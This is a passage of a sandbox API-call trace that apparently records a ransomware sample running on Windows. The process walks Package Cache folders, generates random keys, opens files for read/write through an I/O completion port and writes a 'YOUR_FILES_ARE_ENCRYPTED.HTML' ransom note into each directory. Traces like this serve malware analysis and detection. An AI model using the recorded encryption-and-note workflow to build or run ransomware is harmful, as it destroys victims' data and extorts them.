Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*" [0109.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0da8, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0109.236] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0da8, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0109.237] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fcd23d, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fcd23d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0da8, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0109.237] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.237] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned 114 [0109.237] GetProcessHeap () returned 0x600000 [0109.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.237] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0109.237] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*" [0109.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fcd23d, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fcd23d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.238] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fcd23d, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fcd23d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0109.238] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x681d000, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0x681d000, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0x681d000, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0109.238] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.238] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0109.238] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.238] lstrlenW (lpString=".cab") returned 4 [0109.238] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.238] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0109.238] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=809765) returned 1 [0109.238] GetProcessHeap () returned 0x600000 [0109.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0109.241] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="40") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="AD") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="E2") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="69") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="CD") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="14") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F5") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="56") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="6B") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="1D") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="B6") returned 2 [0109.241] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="A7") returned 2 [0109.241] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="DA") returned 2 [0109.241] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="BE") returned 2 [0109.241] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="01") returned 2 [0109.241] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="0F") returned 2 [0109.241] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="C0") returned 2 [0109.242] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="A1") returned 2 [0109.242] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="21") returned 2 [0109.242] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="E8") returned 2 [0109.242] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="DF") returned 2 [0109.242] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="89") returned 2 [0109.242] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="6B") returned 2 [0109.242] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="E7") returned 2 [0109.242] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="59") returned 2 [0109.242] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="78") returned 2 [0109.242] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="ED") returned 2 [0109.242] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="36") returned 2 [0109.242] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="B4") returned 2 [0109.242] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="80") returned 2 [0109.242] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="9F") returned 2 [0109.242] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="0E") returned 2 [0109.242] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0109.242] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.242] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0109.242] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca02a400, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xca02a400, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xca02a400, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0109.242] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.242] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0109.243] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0109.243] lstrlenW (lpString=".msi") returned 4 [0109.243] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0109.243] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca02a400, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xca02a400, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xca02a400, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0109.243] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.243] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0109.243] GetProcessHeap () returned 0x600000 [0109.243] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.243] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0109.244] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0109.325] CloseHandle (hObject=0x308) returned 1 [0109.355] GetProcessHeap () returned 0x600000 [0109.355] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.356] GetProcessHeap () returned 0x600000 [0109.356] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.356] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fcd23d, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fcd23d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0da8, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0109.356] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0109.357] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.357] GetProcessHeap () returned 0x600000 [0109.357] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0109.358] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0109.359] CloseHandle (hObject=0x30c) returned 1 [0109.360] GetProcessHeap () returned 0x600000 [0109.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.360] GetProcessHeap () returned 0x600000 [0109.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.361] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44f9f6d5, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44f9f6d5, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44f9f6d5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0109.361] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0109.361] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0109.361] GetProcessHeap () returned 0x600000 [0109.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.363] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.364] CloseHandle (hObject=0x314) returned 1 [0109.365] GetProcessHeap () returned 0x600000 [0109.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.365] GetProcessHeap () returned 0x600000 [0109.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.366] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4965d4d1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0109.366] StrStrIW (lpFirst="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.366] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0109.366] GetProcessHeap () returned 0x600000 [0109.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0109.367] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0109.367] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*" [0109.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4965d4d1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.367] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4965d4d1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0109.367] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xa4f13e84, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x27e, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0109.367] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.368] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0109.368] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0109.368] lstrlenW (lpString=".rsm") returned 4 [0109.368] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0109.368] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x462e9abd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0109.368] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.368] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0109.368] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0109.368] lstrlenW (lpString=".exe") returned 4 [0109.368] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0109.368] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4965d4d1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4965d4d1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x462e9abd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0109.368] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.368] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0109.368] GetProcessHeap () returned 0x600000 [0109.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0109.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.370] WriteFile (in: hFile=0x314, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.371] CloseHandle (hObject=0x314) returned 1 [0109.372] GetProcessHeap () returned 0x600000 [0109.372] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0109.372] GetProcessHeap () returned 0x600000 [0109.372] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.372] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ea95f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69eaf8db, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69eaf8db, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", cAlternateFileName="{EEA66~1.285")) returned 1 [0109.372] StrStrIW (lpFirst="{EEA66967-97E2-4561-A999-5C22E3CDE428}v14.25.28508", 